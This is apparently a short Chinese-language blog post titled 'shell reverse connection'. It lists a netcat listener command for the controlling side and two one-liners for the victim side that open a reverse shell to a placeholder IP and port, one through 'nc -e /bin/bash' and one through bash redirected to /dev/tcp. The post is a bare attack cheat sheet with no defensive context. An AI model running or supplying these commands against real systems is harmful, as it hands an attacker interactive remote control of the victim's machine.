2021年2月5日 星期五

shell 反向連接

控制端
nc -lvp [port]

受控端
a. nc [ip] [port] -e /bin/bash
b. bash -i >/dev/tcp/[ip]/[port] 0>&1 2>&2

沒有留言: